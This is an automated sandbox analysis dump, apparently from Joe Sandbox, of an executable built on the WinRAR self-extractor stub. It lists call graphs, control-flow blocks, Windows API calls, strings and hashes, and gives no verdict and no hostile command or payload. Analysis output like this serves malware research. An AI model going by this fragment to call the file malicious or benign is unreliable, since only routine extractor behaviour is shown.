25027 cea6b3 25037 cec528 25027->25037 25029 cea6c2 25035 cea6d1 25029->25035 25050 cea529 29 API calls 25029->25050 25032 cea6cc 25051 cea5df GetStdHandle GetFileType 25032->25051 25033 cea6e2 _abort 25033->25019 25052 cea6ed LeaveCriticalSection _abort 25035->25052 25036->25027 25038 cec534 ___scrt_is_nonwritable_in_current_image 25037->25038 25039 cec558 25038->25039 25040 cec541 25038->25040 25053 ceac31 EnterCriticalSection 25039->25053 25061 ce91a8 20 API calls __dosmaperr 25040->25061 25043 cec564 25049 cec590 25043->25049 25054 cec479 25043->25054 25044 cec546 25062 ce9087 26 API calls __cftof 25044->25062 25046 cec550 _abort 25046->25029 25063 cec5b7 LeaveCriticalSection _abort 25049->25063 25050->25032 25051->25035 25052->25033 25053->25043 25055 ceb136 __dosmaperr 20 API calls 25054->25055 25058 cec48b 25055->25058 25056 cec498 25057 ce8dcc _free 20 API calls 25056->25057 25059 cec4ea 25057->25059 25058->25056 25060 ceaf0a 11 API calls 25058->25060 25059->25043 25060->25058 25061->25044 25062->25046 25063->25046 25065 cdec50 25064->25065 25066 cd086d GetModuleHandleW 25065->25066 25067 cd0888 GetProcAddress 25066->25067 25068 cd08e7 25066->25068 25069 cd08b9 GetProcAddress 25067->25069 25070 cd08a1 25067->25070 25071 cd0c14 GetModuleFileNameW 25068->25071 25169 ce75fb 42 API calls __vsnwprintf_l 25068->25169 25074 cd08cb 25069->25074 25070->25069 25086 cd0c32 25071->25086 25073 cd0b54 25073->25071 25075 cd0b5f GetModuleFileNameW CreateFileW 25073->25075 25074->25068 25076 cd0b8f SetFilePointer 25075->25076 25077 cd0c08 CloseHandle 25075->25077 25076->25077 25078 cd0b9d ReadFile 25076->25078 25077->25071 25078->25077 25081 cd0bbb 25078->25081 25081->25077 25083 cd081b 2 API calls 25081->25083 25082 cd0c94 GetFileAttributesW 25085 cd0cac 25082->25085 25082->25086 25083->25081 25084 cd0c5d CompareStringW 25084->25086 25087 cd0cb7 25085->25087 25090 cd0cec 25085->25090 25086->25082 25086->25084 25086->25085 25160 ccb146 25086->25160 25163 cd081b 25086->25163 
25089 cd0cd0 GetFileAttributesW 25087->25089 25091 cd0ce8 25087->25091 25088 cd0dfb 25112 cda64d GetCurrentDirectoryW 25088->25112 25089->25087 25089->25091 25090->25088 25092 ccb146 GetVersionExW 25090->25092 25091->25090 25093 cd0d06 25092->25093 25094 cd0d0d 25093->25094 25095 cd0d73 25093->25095 25097 cd081b 2 API calls 25094->25097 25096 cc4092 _swprintf 51 API calls 25095->25096 25098 cd0d9b AllocConsole 25096->25098 25099 cd0d17 25097->25099 25100 cd0da8 GetCurrentProcessId AttachConsole 25098->25100 25101 cd0df3 ExitProcess 25098->25101 25102 cd081b 2 API calls 25099->25102 25170 ce3e13 25100->25170 25104 cd0d21 25102->25104 25106 cce617 53 API calls 25104->25106 25105 cd0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25105->25101 25107 cd0d3c 25106->25107 25108 cc4092 _swprintf 51 API calls 25107->25108 25109 cd0d4f 25108->25109 25110 cce617 53 API calls 25109->25110 25111 cd0d5e 25110->25111 25111->25101 25112->24912 25114 cd081b 2 API calls 25113->25114 25115 cdac2a OleInitialize 25114->25115 25116 cdac4d GdiplusStartup SHGetMalloc 25115->25116 25116->24914 25118 cdc5ce 25117->25118 25119 cdc6e4 25118->25119 25120 cd1fac CharUpperW 25118->25120 25172 ccf3fa 82 API calls 2 library calls 25118->25172 25119->24923 25119->24924 25120->25118 25123 cdec50 25122->25123 25124 cddbeb SetEnvironmentVariableW 25123->25124 25125 cddc0e 25124->25125 25126 cddc36 25125->25126 25127 cddc2a SetEnvironmentVariableW 25125->25127 25126->24917 25127->25126 25129 cdb6fe 25128->25129 25130 cdb70b GetObjectW 25128->25130 25173 cda6c2 FindResourceW 25129->25173 25132 cdb71a 25130->25132 25134 cda5c6 4 API calls 25132->25134 25137 cdb72d 25134->25137 25135 cdb770 25147 ccda42 25135->25147 25136 cdb74c 25187 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25136->25187 25137->25135 25137->25136 25138 cda6c2 12 API calls 25137->25138 25140 cdb73d 25138->25140 25140->25136 25143 cdb743 DeleteObject 25140->25143 25141 cdb754 25188 cda5e4 GetDC GetDeviceCaps GetDeviceCaps 
ReleaseDC 25141->25188 25143->25136 25144 cdb75d 25189 cda80c 8 API calls 25144->25189 25146 cdb764 DeleteObject 25146->25135 25198 ccda67 25147->25198 25152 cd90b7 25153 cdeb38 8 API calls 25152->25153 25154 cd90d6 25153->25154 25154->24936 25156 cdacab GdiplusShutdown OleUninitialize 25155->25156 25156->24952 25158->24943 25159->24951 25161 ccb15a GetVersionExW 25160->25161 25162 ccb196 25160->25162 25161->25162 25162->25086 25164 cdec50 25163->25164 25165 cd0828 GetSystemDirectoryW 25164->25165 25166 cd085e 25165->25166 25167 cd0840 25165->25167 25166->25086 25168 cd0851 LoadLibraryW 25167->25168 25168->25166 25169->25073 25171 ce3e1b 25170->25171 25171->25105 25171->25171 25172->25118 25174 cda7d3 25173->25174 25175 cda6e5 SizeofResource 25173->25175 25174->25130 25174->25132 25175->25174 25176 cda6fc LoadResource 25175->25176 25176->25174 25177 cda711 LockResource 25176->25177 25177->25174 25178 cda722 GlobalAlloc 25177->25178 25178->25174 25179 cda73d GlobalLock 25178->25179 25180 cda7cc GlobalFree 25179->25180 25181 cda74c __InternalCxxFrameHandler 25179->25181 25180->25174 25182 cda7c5 GlobalUnlock 25181->25182 25190 cda626 GdipAlloc 25181->25190 25182->25180 25185 cda79a GdipCreateHBITMAPFromBitmap 25186 cda7b0 25185->25186 25186->25182 25187->25141 25188->25144 25189->25146 25191 cda638 25190->25191 25193 cda645 25190->25193 25194 cda3b9 25191->25194 25193->25182 25193->25185 25193->25186 25195 cda3da GdipCreateBitmapFromStreamICM 25194->25195 25196 cda3e1 GdipCreateBitmapFromStream 25194->25196 25197 cda3e6 25195->25197 25196->25197 25197->25193 25199 ccda75 __EH_prolog 25198->25199 25200 ccdaa4 GetModuleFileNameW 25199->25200 25201 ccdad5 25199->25201 25202 ccdabe 25200->25202 25244 cc98e0 25201->25244 25202->25201 25204 ccdb31 25255 ce6310 25204->25255 25205 cc959a 80 API calls 25207 ccda4e 25205->25207 25206 cce261 78 API calls 25209 ccdb05 25206->25209 25242 cce29e GetModuleHandleW FindResourceW 25207->25242 25209->25204 25209->25206 25235 ccdd4a 

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00CD0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00CD087C
                                                              • Part of subcall function 00CD0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CD088E
                                                              • Part of subcall function 00CD0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CD08BF
                                                              • Part of subcall function 00CDA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CDA655
                                                              • Part of subcall function 00CDAC16: OleInitialize.OLE32(00000000), ref: 00CDAC2F
                                                              • Part of subcall function 00CDAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CDAC66
                                                              • Part of subcall function 00CDAC16: SHGetMalloc.SHELL32(00D08438), ref: 00CDAC70
                                                            • GetCommandLineW.KERNEL32 ref: 00CDDF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CDDF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CDDF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00CDDFCE
                                                              • Part of subcall function 00CDDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CDDBF4
                                                              • Part of subcall function 00CDDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CDDC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 00CDDFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,00D1EC90,00000800), ref: 00CDDFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,00D1EC90), ref: 00CDDFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 00CDE009
                                                            • _swprintf.LIBCMT ref: 00CDE048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CDE05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00CDE061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 00CDE078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00CDE0C9
                                                            • Sleep.KERNEL32(?), ref: 00CDE0F7
                                                            • DeleteObject.GDI32 ref: 00CDE130
                                                            • DeleteObject.GDI32(?), ref: 00CDE140
                                                            • CloseHandle.KERNEL32 ref: 00CDE183
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 3049964643-3743209390
                                                            • Opcode ID: 7e028a9a323587d8fa3e6ec615caf6676ef0974dca994f9c39e27f35438fdd45
                                                            • Instruction ID: ad3e4e2afdb8e70426ef12c3275aaf09c854915aef461ab4cb38d36035651922
                                                            • Opcode Fuzzy Hash: 7e028a9a323587d8fa3e6ec615caf6676ef0974dca994f9c39e27f35438fdd45
                                                            • Instruction Fuzzy Hash: E961D271A04345BBD320ABA4EC49F7F77A9AB45700F00442BFA4AD23A1DF749944D772

                                                            Control-flow Graph

                                                            control_flow_graph 812 cda6c2-cda6df FindResourceW 813 cda7db 812->813 814 cda6e5-cda6f6 SizeofResource 812->814 815 cda7dd-cda7e1 813->815 814->813 816 cda6fc-cda70b LoadResource 814->816 816->813 817 cda711-cda71c LockResource 816->817 817->813 818 cda722-cda737 GlobalAlloc 817->818 819 cda73d-cda746 GlobalLock 818->819 820 cda7d3-cda7d9 818->820 821 cda7cc-cda7cd GlobalFree 819->821 822 cda74c-cda76a call ce0320 819->822 820->815 821->820 826 cda76c-cda78e call cda626 822->826 827 cda7c5-cda7c6 GlobalUnlock 822->827 826->827 832 cda790-cda798 826->832 827->821 833 cda79a-cda7ae GdipCreateHBITMAPFromBitmap 832->833 834 cda7b3-cda7c1 832->834 833->834 835 cda7b0 833->835 834->827 835->834
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA703
                                                            • LockResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA72D
                                                            • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA73E
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00CDA7C6
                                                              • Part of subcall function 00CDA626: GdipAlloc.GDIPLUS(00000010), ref: 00CDA62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CDA7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 00CDA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                            • String ID: PNG
                                                            • API String ID: 541704414-364855578
                                                            • Opcode ID: adc3c27d25da5ae141a146d576b775628e02a41f5722261a57d06cbd420e2505
                                                            • Instruction ID: b1630b1cecd9fe471fb7be987c7451b9123abae896e4612ee5534265ed431519
                                                            • Opcode Fuzzy Hash: adc3c27d25da5ae141a146d576b775628e02a41f5722261a57d06cbd420e2505
                                                            • Instruction Fuzzy Hash: 5E319175600342BFD7109F21EC88E2F7BB9EF84761B15451AFA15C2321EB31DD44DAA2

                                                            Control-flow Graph

                                                            control_flow_graph 1030 cca69b-cca6bf call cdec50 1033 cca727-cca730 FindNextFileW 1030->1033 1034 cca6c1-cca6ce FindFirstFileW 1030->1034 1035 cca742-cca7ff call cd0602 call ccc310 call cd15da * 3 1033->1035 1036 cca732-cca740 GetLastError 1033->1036 1034->1035 1037 cca6d0-cca6e2 call ccbb03 1034->1037 1041 cca804-cca811 1035->1041 1038 cca719-cca722 1036->1038 1045 cca6fe-cca707 GetLastError 1037->1045 1046 cca6e4-cca6fc FindFirstFileW 1037->1046 1038->1041 1048 cca709-cca70c 1045->1048 1049 cca717 1045->1049 1046->1035 1046->1045 1048->1049 1050 cca70e-cca711 1048->1050 1049->1038 1050->1049 1052 cca713-cca715 1050->1052 1052->1038
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6C4
                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA728
                                                            • GetLastError.KERNEL32(?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA734
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: dc4b0683fa7bc1563b306c47cd28cbc6507c119b2241fc829546be79d818e682
                                                            • Instruction ID: 0bd3d2119a5de08dabd0e148464633c5fee509b36daac70e3f78f8961415629b
                                                            • Opcode Fuzzy Hash: dc4b0683fa7bc1563b306c47cd28cbc6507c119b2241fc829546be79d818e682
                                                            • Instruction Fuzzy Hash: 8F418072500559ABCB25DF64CC88BE9B7B8FB48350F14419AE96DD3200D734AE90DF91
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002,00000000), ref: 00CE7E0F
                                                            • TerminateProcess.KERNEL32(00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002,00000000), ref: 00CE7E16
                                                            • ExitProcess.KERNEL32 ref: 00CE7E28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 873838a1e9dcb8ec512ab8134f66a8d386ebec8e86899bbd1ed0eb732709036a
                                                            • Instruction ID: fd21ebdc42877ba7ef0112347b27df6dbfab407cbd84f431e280ab2befcbbcdd
                                                            • Opcode Fuzzy Hash: 873838a1e9dcb8ec512ab8134f66a8d386ebec8e86899bbd1ed0eb732709036a
                                                            • Instruction Fuzzy Hash: 03E09A31004294BFCB116F55DD0AB5A7F69AB50341B004555F8158B132CB35EE51DB91
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 01559e70a9b012ed2665eec784eac0698f5ff233111a9a8faf3299cfc2fd602c
                                                            • Instruction ID: 7c96fdd495a8cfb93c4b101d06abf84f789af1523dcd4e85a4bd20ff232e61cc
                                                            • Opcode Fuzzy Hash: 01559e70a9b012ed2665eec784eac0698f5ff233111a9a8faf3299cfc2fd602c
                                                            • Instruction Fuzzy Hash: 9482F870904245AEDF15DB64C895FFBBBB9AF05300F0841BEE8599B282DB705B8DDB60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CDB7E5
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDB8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 00CDB902
                                                            • TranslateMessage.USER32(?), ref: 00CDB910
                                                            • DispatchMessageW.USER32(?), ref: 00CDB91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CDB93D
                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00CDB960
                                                            • GetDlgItem.USER32(?,00000068), ref: 00CDB983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDB99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDB9B1
                                                              • Part of subcall function 00CDD453: _wcslen.LIBCMT ref: 00CDD47D
                                                            • SetFocus.USER32(00000000), ref: 00CDB9B8
                                                            • _swprintf.LIBCMT ref: 00CDBA24
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                              • Part of subcall function 00CDD4D4: GetDlgItem.USER32(00000068,00D1FCB8), ref: 00CDD4E8
                                                              • Part of subcall function 00CDD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00CDAF07,00000001,?,?,00CDB7B9,00CF506C,00D1FCB8,00D1FCB8,00001000,00000000,00000000), ref: 00CDD510
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDD51B
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDD529
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD53F
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CDD559
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD59D
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CDD5AB
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD5BA
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD5E1
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CF43F4), ref: 00CDD5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CDBA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CDBA90
                                                            • GetTickCount.KERNEL32 ref: 00CDBAAE
                                                            • _swprintf.LIBCMT ref: 00CDBAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 00CDBAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CDBB43
                                                            • _swprintf.LIBCMT ref: 00CDBB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CDBBD0
                                                            • GetCommandLineW.KERNEL32 ref: 00CDBBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00CDBC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00CDBC6F
                                                            • Sleep.KERNEL32(00000064), ref: 00CDBCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00CDBCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 00CDBCEB
                                                            • _swprintf.LIBCMT ref: 00CDBD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDBD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,00CF35F4), ref: 00CDBD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 00CDBD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00CDBDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CDBDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDBE68
                                                            • _wcslen.LIBCMT ref: 00CDBEBE
                                                            • _swprintf.LIBCMT ref: 00CDBEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CDBF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CDBF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 00CDBF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CDBF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 00CDBF85
                                                            • SetWindowTextW.USER32(00000000,00D0A472), ref: 00CDBFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CDC007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDC01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00CDC0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00CDC197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CDC1D9
                                                              • Part of subcall function 00CDC73F: __EH_prolog.LIBCMT ref: 00CDC744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDC1FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                            • API String ID: 3445078344-2238251102
                                                            • Opcode ID: ed0ecb5a5d0a6588793da6d0269fd358d0d8ce1065af8473500451ad807c1ca6
                                                            • Instruction ID: b02bda95bf7c78da842c67a684774b6dcab831cf87a6c31d76e57226e2214bea
                                                            • Opcode Fuzzy Hash: ed0ecb5a5d0a6588793da6d0269fd358d0d8ce1065af8473500451ad807c1ca6
                                                            • Instruction Fuzzy Hash: DE42F470944349BAEB21AB60DC8AFBE776CAB11700F00405AF758E63D2CB749E45EB71

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 00CD087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CD088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CD08BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CD0B69
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CD0B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CD0B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00CF3C7C,00000000), ref: 00CD0BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 00CD0C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CD0C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CF3C7C,?,00000000,?,00000800), ref: 00CD0C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,00CF3C7C,00000800,?,00000000,?,00000800), ref: 00CD0C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,00CF3D44,00000800), ref: 00CD0CD8
                                                              • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                              • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
